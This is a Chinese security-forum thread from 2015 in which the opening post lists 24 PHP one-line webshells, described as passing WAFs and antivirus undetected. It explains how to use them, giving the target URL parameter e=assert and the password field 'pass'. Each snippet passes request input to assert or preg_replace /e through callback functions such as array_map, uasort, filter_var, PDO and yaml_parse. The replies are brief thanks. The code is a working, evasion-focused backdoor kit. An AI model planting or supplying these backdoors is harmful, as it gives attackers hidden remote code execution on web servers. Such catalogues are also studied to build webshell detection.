查看: 50496|回复: 131

过狗过盾无特征无动态函数PHP一句话

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-7-20 11:43:29 | 显示全部楼层 |阅读模式
    转自90sec@phithon

    分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)

    原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
    所有一句话使用方法基本都是:
    http:// target/shell.php?e=assert 密码pass

    01
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'],);
    array_filter($arr, $e);

    02
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'],);
    array_map($e, $arr);

    03
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $arr = array('test', $_REQUEST['pass']);
    uasort($arr, $e);

    04
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $arr = array('test' => 1, $_REQUEST['pass'] => 2);
    uksort($arr, $e);

    05
    [PHP] 纯文本查看 复制代码
    $arr = new ArrayObject(array('test', $_REQUEST['pass']));
    $arr->uasort('assert');

    06
    [PHP] 纯文本查看 复制代码
    $arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
    $arr->uksort('assert');

    07
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $arr = array(1);
    array_reduce($arr, $e, $_POST['pass']);

    08
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass']);
    $arr2 = array(1);
    array_udiff($arr, $arr2, $e);

    09
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'] => '|.*|e',);
    array_walk($arr, $e, '');

    10
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'] => '|.*|e',);
    array_walk_recursive($arr, $e, '');

    11
    [PHP] 纯文本查看 复制代码
    mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');

    12
    [PHP] 纯文本查看 复制代码
    echo preg_filter('|.*|e', $_REQUEST['pass'], '');

    13
    [PHP] 纯文本查看 复制代码
    ob_start('assert');
    echo $_REQUEST['pass'];
    ob_end_flush();

    14
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    register_shutdown_function($e, $_REQUEST['pass']);

    15
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    declare(ticks=1);
    register_tick_function($e, $_REQUEST['pass']);

    16
    [PHP] 纯文本查看 复制代码
    filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));

    17
    [PHP] 纯文本查看 复制代码
    filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

    18
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $db = new PDO('sqlite:sqlite.db3');
    $db->sqliteCreateFunction('myfunc', $e, 1);
    $sth = $db->prepare("SELECT myfunc(:exec)");
    $sth->execute(array(':exec' => $_REQUEST['pass']));

    19
    [PHP] 纯文本查看 复制代码
    $e = $_REQUEST['e'];
    $db = new SQLite3('sqlite.db3');
    $db->createFunction('myfunc', $e);
    $stmt = $db->prepare("SELECT myfunc(?)");
    $stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
    $stmt->execute();

    20
    [PHP] 纯文本查看 复制代码
    $str = urlencode($_REQUEST['pass']);
    $yaml = <<<EOD
    greeting: !{$str} "|.+|e"
    EOD;
    $parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));

    21
    [PHP] 纯文本查看 复制代码
    $mem = new Memcache();
    $re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
    $mem->connect($_REQUEST['pass'], 11211, 0);

    22
    [PHP] 纯文本查看 复制代码
    preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

    23
    [PHP] 纯文本查看 复制代码
    mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

    24
    [PHP] 纯文本查看 复制代码
    $iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));
    foreach ($iterator as $item) {echo $item;}
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2015-7-20 13:21:54 | 显示全部楼层
    这个还是很有干货的
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-20 16:23:50 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2016-10-25 18:06
  • 签到天数: 54 天

    [LV.5]常住居民I

    发表于 2015-7-20 19:29:57 | 显示全部楼层
    支持90 支持08红盟
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-22 00:22:52 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-22 01:17:22 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-23 01:57:52 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-23 06:18:35 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-7-23 06:45:26 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-23 07:05:18 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 11:23 , Processed in 0.029729 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部